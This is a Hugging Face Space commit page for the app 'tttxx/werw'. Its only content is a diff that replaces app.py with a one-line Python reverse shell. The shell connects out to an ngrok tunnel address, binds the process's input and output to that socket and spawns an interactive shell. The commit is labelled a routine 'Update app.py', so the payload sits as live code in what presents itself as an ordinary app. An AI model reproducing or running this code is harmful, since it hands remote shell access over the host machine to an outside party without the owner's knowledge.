Hugging Face
Models
Datasets
Spaces
Buckets
new
Docs
Enterprise
Pricing
Log In
Sign Up
Spaces:
tttxx
/
werw
like
0
Runtime error
App
Files
Files
Community
Fetching metadata from the HF Docker repository...
tttxx
commited on
Aug 15, 2024
Commit
474810c
·
verified
·
1 Parent(s):
265845f
Update app.py
Browse files
Files changed (1)
hide
show
app.py
+1
-1
app.py
CHANGED
Viewed
@@ -1 +1 @@
1
-
c
1
+
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("0.tcp.ap.ngrok.io",17856));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")